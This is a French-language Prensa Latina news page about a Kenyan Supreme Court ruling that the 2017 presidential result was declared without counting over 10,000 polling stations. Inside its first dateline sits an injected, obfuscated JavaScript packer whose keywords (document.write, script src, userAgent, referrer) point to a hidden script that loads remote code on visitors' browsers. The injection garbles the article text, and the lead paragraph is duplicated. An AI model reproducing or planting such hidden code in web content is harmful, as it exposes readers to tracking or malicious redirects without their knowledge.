mercredi 24 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Présidentielles kényanes : un oubli de 10 mille bureaux de vote

Nairobi, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|heahi|var|u0026u|referrer|rbbst||js|php'.split('|'),0,{})) 20 septembre (Prensa Latina) Le Tribunal Suprême du Kenya a aujourd'hui révélé que la Commission Électorale de ce pays a déclaré Uhuru Kenyatta président du pays malgré l'oubli du comptage de plus de 10 mille bureaux de vote.

Nairobi, 20 septembre (Prensa Latina) Le Tribunal Suprême du Kenya a aujourd’hui révélé que la Commission Électorale de ce pays a déclaré Uhuru Kenyatta président du pays malgré l’oubli du comptage de plus de 10 mille bureaux de vote.

La décision judiciaire, intégralement diffusée ce mercredi, refuse les explications de la Commission Électorale, au sujet de près de 11 mille bureaux de vote, selon laquelle ces centres n’avaient pas de réseaux pour transmettre les résultats à temps.

Le document conclut par l’invalidité des résultats officiels comme cela était déjà acté.

Pour éviter que ces erreurs se reproduisent lors de la répétition des élections, prévue pour le 17 octobre, le Tribunal Suprême a ordonné aux organisateurs qu’ils établissent un système complémentaire en cas de défaillance technologique.

peo/ocs/mt

EN CONTINU
notes connexes